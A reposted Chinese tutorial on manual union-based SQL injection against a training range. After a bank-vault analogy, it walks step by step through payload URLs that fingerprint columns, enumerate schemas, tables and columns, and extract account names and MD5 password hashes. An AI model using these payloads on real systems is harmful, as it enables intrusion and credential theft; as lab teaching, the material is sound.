2. 程式人生 > >零基礎學習手工SQL注入

零基礎學習手工SQL注入

阿新 發佈:2019-02-09
原文地址:https://mozhe.cn/news/detail/324

SQL注入介紹

SQL注入,其實就是使用者瀏覽器提交的變數內容,應用程式(程式碼可能是asp、aspx、php、jsp等)對瀏覽器提交過來的資料未過濾,直接去資料庫查詢,導致把資料庫裡面其他內容(如管理賬戶和密碼)查詢返回到頁面上。先看個《墨者學院故事會》的一個小故事:

某個鎮子裡,銀行保險櫃做為一個公共區域幫居民儲存貴重物品,為了防止錯拿、多拿他人物品,銀行規定:限制每人每次只能帶一把開自己保險櫃的鑰匙,取自己的東西出入。在銀行安檢門口有個負責檢查的安檢員,安檢員職責就是檢查進入銀行保險櫃取物品的人每次是否只帶了一把鑰匙。

這個鎮子上有多家銀行,有個人名字叫“路人甲”,他去A銀行取物品,A銀行的安檢員盡職盡責,對“路人甲”的全身上下、裡裡外外一絲不苟的檢查N遍,確定他只帶了一把自己的鑰匙後,才放行讓他進去取物品;後來“路人甲”去B銀行去物品,他發現B銀行的安檢員是行長的小舅子,崗位就是個擺設,從未來上過班,進入保險櫃也無人進行檢查。所以“路人甲”帶著他和他老婆的鑰匙一起帶來取,發現成功取到物品後,“路人甲”就多帶把螺絲刀,通過安檢門,利用螺絲刀開啟行長小舅子的櫃子,成功取走了他的物品,“路人甲”發現有行長的櫃子是用鋼板焊的,螺絲刀無法拆開,他就多帶了把切割機,通過安檢門,花了大功夫用切割機把櫃子開啟,把行長櫃子裡的東西全部取走了。

“路人甲”發現這樣可以“致富”,他就整天從各個銀行逛來逛去,去找安檢不嚴的銀行去取他人的東西。每個銀行的安檢門的攝像頭都把他出入記錄了下來,終於有一天,有家銀行告訴了警察,警察調取了攝像頭視訊內容,把“路人甲”給逮捕了。根據相關法律法規,“路人甲”涉嫌未授權獲取(入侵)他人物品,被判刑入獄。

我們把這個故事裡面的每個內容分配個角色:

◆ 鎮子==網際網路

◆ 銀行==業務系統(網站)

◆ 安檢門==應用程式(程式碼)

◆ 安檢員==過濾非安全程式碼(如SQL注入、XSS等危險程式碼)

◆ 保險櫃的物品==儲存在資料庫中的資料,可能包含賬戶密碼等敏感資料

◆ 小舅子保險櫃的物品==業務系統(網站)的管理許可權

◆ 行長保險櫃的物品==伺服器(主機)許可權

◆ “路人甲”==操作瀏覽器的人

◆ “路人甲”的鑰匙==提交的正常變數內容

◆ “路人甲”的老婆鑰匙==提交的測試SQL注入的語句

◆ 螺絲刀==提交的SQL注入其他語句

◆ 切割機==WebShell或者提權的命令

◆ 攝像頭==各種日誌記錄

◆ 警察==現實中的警察叔叔

◆ 法律法規==《刑法》、《網路安全法》

如果“路人甲”是一個安保公司的人,他來給銀行做安全防護,他應該最清楚銀行哪些地方是最薄弱的環節。可以給銀行做個安全防護,鎮上來取物品的人比較多,就多做幾個大門(負載均衡),給銀行的安檢門外多加幾層安檢通道(防火牆、WAF、IPS、IDS等安全裝置),把行長的小舅子換掉(修補漏洞),每天來檢查安檢人員是否在崗位上工作(定期檢測),把保險櫃和安檢分別放在不同的房間(資料庫與應用系統分離),全部攝像頭開啟(開啟日誌),除了這之外,還有多種安全防護方式。這裡就不在講故事了,真正到現實的業務系統的加固,是需要根據業務場景來決定的。

線上靶場地址


以下是一個Nginx+PHP+MySQL的業務場景靶場,其中php程式碼對引數內容未做任何過濾,導致SQL注入的產生,這個是最簡單、基礎的SQL注入練習環節,需要使用者瞭解MySQL最基礎的語法和資料庫結構,如果基礎較差,請自行補充MySQL基礎知識。

手工SQL注入詳解

手工SQL注入過程,資料庫執行的語句,是頁面提交至伺服器應用程式,應用程式獲取id的值,然後把值拼接到查詢語句中,在到資料庫中查詢,通過程式解析後,把結果返回在頁面上,(使用時請將mozhe.cn替換成對應的靶場地址)。

開啟靶場環境:


第1步:

頁面提交:http://mozhe.cn/new_list.php?id=1

資料庫執行語句:select * from news where id=1

頁面返回描述:返回內容正常

分析解說:正常瀏覽頁面,找到有引數的地方,如id。

第2步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=1

資料庫執行語句:select * from news where id=1 and 1=1

頁面返回描述:返回內容正常

分析解說:測試SQL語句。

第3步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2

資料庫執行語句:select * from news where id=1 and 1=2

頁面返回描述:返回內容為空

分析解說:因為sql語句中,1=2不成立。

第4步:

頁面提交:http://mozhe.cn/new_list.php?id=1 order by 1

資料庫執行語句:select * from news where id=1 order by 1

頁面返回描述:返回內容正常

分析解說:通過SQL語句中order by N 來判斷有幾個欄位,返回內容正常,可以確定至少有1個欄位。

第5步:

頁面提交:http://mozhe.cn/new_list.php?id=1 order by 2

資料庫執行語句:select * from news where id=1 order by 2

頁面返回描述:返回內容正常

分析解說:通過SQL語句中order by N 來判斷有幾個欄位,返回內容正常,可以確定至少有2個欄位。

第6步:

頁面提交:http://mozhe.cn/new_list.php?id=1 order by 3

資料庫執行語句:select * from news where id=1 order by 3

頁面返回描述:返回內容正常

分析解說:通過SQL語句中order by N 來判斷有幾個欄位,返回內容正常,可以確定至少有3個欄位。

第7步:

頁面提交:http://mozhe.cn/new_list.php?id=1 order by 4

資料庫執行語句:select * from news where id=1 order by 4

頁面返回描述:返回內容正常

分析解說:通過SQL語句中order by N 來判斷有幾個欄位,返回內容正常,可以確定至少有4個欄位。

第8步:

頁面提交:http://mozhe.cn/new_list.php?id=1 order by 5

資料庫執行語句:select * from news where id=1 order by 5

頁面返回描述:返回內容為空

分析解說:通過SQL語句中order by N 來判斷有幾個欄位,返回內容不正常,說明欄位數少於5個。

第9步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,2,3,4

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,2,3,4

頁面返回描述:在原來的標題上位置顯示為2,內容的位置顯示為3

分析解說:通過SQL語句中and 1=2 union select 1,2,3……,n聯合查詢,判斷顯示的是哪些欄位,就是原本顯示標題和內容時候的查詢欄位,原本的查詢應該是select id,title,contents,times from news where id=1,也就是說title標題是第2個位置顯示,contents內容是在第三個位置顯示。關於union的語法介紹,請自行補習功課。

第10步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,database(),version(),4

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,database(),version(),4

頁面返回描述:在原來的標題上位置顯示為mozhe_Discuz_StormGroup,內容的位置顯示為5.7.22-0ubuntu0.16.04.1

分析解說:SQL語句中database()是查詢當前資料庫的名稱(語法:select database();),一個伺服器上可能有多個數據庫,version()是查詢當前資料的版本(語法:select version();),這裡是這2個內容分別顯示在第2、3的位置上,mozhe_Discuz_StormGroup為資料庫,5.7.22-0ubuntu0.16.04.1為資料庫版本和作業系統的版本。

第11步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 0,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 0,1

頁面返回描述:在原來的標題上位置顯示為information_schema,內容的位置顯示為3

分析解說:這裡涉及到資料庫information_schema、表SCHEMATA、列SCHEMA_NAME三個內容,資料庫information_schema是MySQL系統自帶的資料庫,其中記錄了當前資料庫系統中大部分我們需要了結的資訊,比如字符集,許可權相關,資料庫實體物件資訊,外檢約束,分割槽,壓縮表,表資訊,索引資訊,引數,優化,鎖和事物等等。說白了,就是這個預設自帶的資料中,儲存了MySQL的資料庫名字、表名字、列名字和其他資訊,通過information_schema我們可以檢視整個MySQL例項的情況。information_schema的詳細介紹請自行補習(最好是自己安裝一個mysql,連上去看看),limit 0,1意思是從第0行起,取1行資料,information_schema為獲取的第1個數據庫名稱。

第12步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 1,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 1,1

頁面返回描述:在原來的標題上位置顯示為mozhe_Discuz_StormGroup,內容的位置顯示為3

分析解說:limit 1,1意思是從第1行起,取1行資料,mozhe_Discuz_StormGroup為獲取的第2個數據庫名稱。

第13步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 2,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 2,1

頁面返回描述:在原來的標題上位置顯示為mysql,內容的位置顯示為3

分析解說:limit 2,1意思是從第2行起,取1行資料,mysql為獲取的第3個數據庫名稱。

第14步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 3,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 3,1

頁面返回描述:在原來的標題上位置顯示為performance_schema,內容的位置顯示為3

分析解說:limit 3,1意思是從第3行起,取1行資料,performance_schema為獲取的第4個數據庫名稱。

第15步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 4,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 4,1

頁面返回描述:在原來的標題上位置顯示為sys,內容的位置顯示為3

分析解說:limit 4,1意思是從第4行起,取1行資料,sys為獲取的第5個數據庫名稱。

第16步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 5,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 5,1

頁面返回描述:返回內容為空

分析解說:limit 5,1意思是從第5行起,取1行資料,返回為空,說明只有5個數據庫information_schema、mozhe_Discuz_StormGroup、mysql、performance_schema、sys。

第17步:


頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1

頁面返回描述:在原來的標題上位置顯示為StormGroup_member,內容的位置顯示為3

分析解說:查詢對應資料庫mozhe_Discuz_StormGroup的第1個數據表名稱,limit 0,1,第1個表名為StormGroup_member。

第18步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 1,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 1,1

頁面返回描述:在原來的標題上位置顯示為notice,內容的位置顯示為3

分析解說:查詢對應資料庫mozhe_Discuz_StormGroup的第2個數據表名稱,limit 1,1,第2個表名為notice。

第19步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 2,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 2,1

頁面返回描述:返回內容為空

分析解說:返回為空,說明資料庫mozhe_Discuz_StormGroup只有2個數據表,StormGroup_member、notice。

第20步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 0,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 0,1

頁面返回描述:在原來的標題上位置顯示為id,內容的位置顯示為int(11)

分析解說:查詢資料庫mozhe_Discuz_StormGroup的表StormGroup_member中的第1個欄位名稱與型別,第1個名稱為id,型別:整型int(11)。

第21步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 1,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 1,1

頁面返回描述:在原來的標題上位置顯示為name,內容的位置顯示為varchar(20)

分析解說:查詢資料庫mozhe_Discuz_StormGroup的表StormGroup_member中的第2個欄位名稱與型別,第2個名稱為name,型別:字元型varchar(20)。

第22步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 2,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 2,1

頁面返回描述:在原來的標題上位置顯示為password,內容的位置顯示為varchar(255)

分析解說:查詢資料庫mozhe_Discuz_StormGroup的表StormGroup_member中的第3個欄位名稱與型別,第3個名稱為passworde,型別:字元型varchar(255)。

第23步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 3,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 3,1

頁面返回描述:在原來的標題上位置顯示為status,內容的位置顯示為int(11)

分析解說:查詢資料庫mozhe_Discuz_StormGroup的表StormGroup_member中的第4個欄位名稱與型別,第4個名稱為id,型別:整型int(11)。

第24步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 4,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 4,1

頁面返回描述:返回內容為空

分析解說:返回為空,說明資料庫mozhe_Discuz_StormGroup中的表StormGroup_member只有4個欄位,名稱為:id,name,password,status。

第25步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,count(*),3,4 from mozhe_Discuz_StormGroup.StormGroup_member

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,count(*),3,4 from mozhe_Discuz_StormGroup.StormGroup_member

頁面返回描述:在原來的標題上位置顯示為2,內容的位置顯示為3

分析解說:查詢資料庫mozhe_Discuz_StormGroup的表StormGroup_member中資料總數,共有2條資料。

第26步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

頁面返回描述:在原來的標題上位置顯示為mozhe-356f589a7df439f6f744ff19bb8092c0-0,內容的位置顯示為3

分析解說:查詢資料庫mozhe_Discuz_StormGroup的表StormGroup_member中的第1條資料的name、password、status的內容,三者之間用-連線起來,CONCAT的是把產生的字串連線起來,這個地方拼接在一起時為了在一個地方全部顯示出來。可以獲得第一條資料的name賬戶為mozhe,密碼password為356f589a7df439f6f744ff19bb8092c0(md5加密後的密碼,可通過解密獲到明文),status賬戶狀態為0。

第27步:

頁面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1

資料庫執行語句:select * from news where id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1

頁面返回描述:在原來的標題上位置顯示為mozhe-6380305ffa6520047acfe95d29ae707b-1,內容的位置顯示為3

分析解說:查詢資料庫mozhe_Discuz_StormGroup的表StormGroup_member中的第2條資料的name、password、status的內容,三者之間用-連線起來,CONCAT的是把產生的字串連線起來,這個地方拼接在一起時為了在一個地方全部顯示出來。可以獲得第一條資料的name賬戶為mozhe,密碼password為6380305ffa6520047acfe95d29ae707b(md5加密後的密碼,可通過解密獲到明文),status賬戶狀態為1。

把最終MD5後的密碼解密出來,就可以得到後臺登入的明文密碼了。

這個過程中,所有的SQL注入語句未做任何的轉義和註釋,在實際過程中,可能遇到對注入點進行處理,閉合的引號,括號等要先進行閉合,字串的十六進位制,註釋掉多餘的語句等等。

相關推薦

基礎學習手工SQL注入

原文地址:https://mozhe.cn/news/detail/324SQL注入介紹SQL注入,其實就是使用者瀏覽器提交的變數內容,應用程式(程式碼可能是asp、aspx、php、jsp等)對瀏覽器提交過來的資料未過濾,直接去資料庫查詢,導致把資料庫裡面其他內容(如管理賬

基礎學習手工SQL註入

SQL SQL註入 手工 SQL註入介紹 SQL註入,其實就是用戶瀏覽器提交的變量內容,應用程序(代碼可能是asp、aspx、php、jsp等)對瀏覽器提交過來的數據未過濾,直接去數據庫查詢,導致把數據庫裏面其他內容(如管理賬戶和密碼)查詢返回到頁面上。先看個《墨者學院故事會》的一個小故事: 某

(Oracle)基礎學習SQL語句--第1篇

《這一輩子只活三個字》 有一天我告訴了你這個祕密,天知地知你知我知的祕密 在學習SQL(結構化查詢語言(Structured Query Language)簡稱SQL,是一種特殊的程式語言,是一種資料庫查詢和程式設計語言)之前我們一起來認識一下什麼是表結構,此時此刻你不用

Java基礎學習Java編程語言從哪兒入手?

軟件工程是計算機領域發展最快的學科分支之一,國家非常重視軟件行業的發展。對軟件工程師人才的培養給予了非常優惠的政策。在所有軟件開發類人才的需求中對Java工程師的需求達到全部需求量的60~70%。應該說Java軟件工程師就業前景是非常好的,再加上Java軟件工程師不僅IT專業企業需要,廣大的非IT企業也

salesforce基礎學習(七十二)項目中的零碎知識點小總結(一)

gin 不同 grant dmi ima -m ron 角色 com 項目終於告一段落,雖然比較苦逼,不過也學到了好多知識,總結一下,以後當作參考。 一.visualforce標簽中使用html相關的屬性使用 曾經看文檔沒有看得仔細,導致開發的時候走了一些彎路。還好得到

基礎學習python

fix pytho 零基礎 基礎 tar install 基礎學習 默認 prefix wget http://www.python.org/ftp/python/2.7.8/Python-2.7.8.tgz tar -zxvf Python-2.7.8.tgz cd Py

salesforce基礎學習(七十四)apex:actionRegion以及apex:actionSupport淺談

xxx turn 組件 聯動 異步 action cti 相關 bottom 我們在開發中,很難會遇見不提交表單的情況。常用的apex:commandButton,apex:commandLink,apex:actionFunction,apex:actionSupport

Python基礎學習系列之二--Python介紹及環境搭建

url 軟件包 三方庫 簡單的 lin 文件的 span 高級程序設計 擴展 1-1、Python簡介:  Python是一種解釋型、面向對象、動態數據類型的高級程序設計語言。Python由Guido van Rossum於1989年底發明,第一個公開發行版發行於1991年

五本書籍助你從基礎學習java編程到精通之路

html 書籍 區域 快速 學會 即使 沒有 j2e j2se 前天的文章給大家介紹了Java初學者應該學習哪些基礎,亦是美網絡小編從Java的三個大方向:J2SE、J2EE、J2ME對大家做了前景分析,這兩天也收到了大家的很多反饋,很多小夥伴看了後對自己的Java編程方向

python基礎學習-基礎知識1-python簡介

聲明 gb2312 線程 1byte 基礎知識 優勢 org 格式 使用 編程語言分類方法1: 編譯型: 如C,C++, 編寫代碼為源文件, 要編輯生成可執行文件才能執行 解釋型: 如vbs, python無需編譯, 使用解釋器來執行, 可執行性更好; java使用了兩者

python基礎學習-基礎知識2-代碼初見

name clas nco and tin put 輸出 strong break 註釋及引號的使用 #我是一行註釋 ‘‘‘ 那麽巧, 我也是一行註釋 ‘‘‘ print(‘‘‘打印多行字符串-第一行 打印多行字符串-第二行 ‘‘‘) print("我在嘗試引號嵌套‘我在

python基礎學習-基礎知識5-集合與文件

blog type line 不存在 變更 file python 判斷 pen 集合: 一種特殊的列表 集合中的數據不會重復 可以測試兩組數據的關系: 交集, 並集, 差集 集合中的數據是無序的 1. 創建集合 #--------------------------

es6基礎學習之項目目錄創建(一)

起名字 ack 文件夾 零基礎 常見 基本 font install 有一個 和大家分享一下在學習es6的過程中所積累的東西,也希望更多的朋友能夠互相學習 首先創建項目目錄 打開你的命令行,什麽文件下都可以,大家請隨意,我自己用的git,輸入 mkdir es6    創建

[總結]FFMPEG視音頻編解碼基礎學習方法

配置 音頻技術 build align jpeg 完成 data 步驟 c函數 http://blog.csdn.net/leixiaohua1020/article/details/15811977 在CSDN上的這一段日子,接觸到了很多同行業的人,尤其是使用FFMPEG

基礎學習python_easygui(35課)

玩遊戲 進行 總結 xbox 文本文 就是 option 執行 空字符串   今天學習的內容我覺得還是很有意思的,當然我主要也是從這個網址學的:http://bbs.fishc.com/thread-46069-1-1.html,大家可以直接看這個網址進行學習,當然也可以看

基礎學習python_字符串(14-15課)

不同 lower scrip ide 一點 忽略 一個空格 mat 這一   今天回顧下我之前學習python的第一個對象——字符串,這個對象真蛋疼,因為方法是最多的,也是最常見的類型,沒有之一。。。   內容有點多,我就搜了下網上的資料,轉載下這個看起來還不錯的網址吧:h

基礎學習雲計算,個人的一點小看法!

雲計算、openstack、零基礎學習、培訓 近期有挺多的人加我,詢問雲計算相關的技術、工作、未來就業、薪資福利等一些事情。和這些同誌們聊天,感覺雲計算在北京的發展和二三線城市隔了一趟鴻溝(不喜勿碰,可以來辯)。今天主要是想通過文字想和大家來交流一下我自己對這個行業的一丟丟看法。以下觀點純粹為個人看法,

linux基礎學習之Linux sed 命令常用操作詳解

延伸 進行 數據 12px -i 空白 字符串 options 信息 sed是Linux系統中一個很好的文件處理工具,可以對數據進行替換、刪除、新增以及選取等操作,使用起來也十分方面,以下是全面的sed操作介紹。sed命令行格式:sed [options] 'com

[總結]視音頻編解碼技術基礎學習方法

研發 視頻服務 put 之一 封裝格式 名稱 土豆 廣播 方便 一直想把視音頻編解碼技術做一個簡單的總結,可是苦於時間不充裕,一直沒能完成。今天有著很大的空閑,終於可以總結一個有關視音頻技術的入門教程,可以方便更多的人學習從零開始學習視音頻技術。需要註意的是,本文所說的視音

salesforce基礎學習(八十五)streaming api 簡單使用(接近實時獲取你需要跟蹤的數據的更新消息狀態)

source fault default 時間戳 存儲 推送 not lac alt Streaming API參考鏈接: https://trailhead.salesforce.com/en/modules/api_basics/units/api_basics_str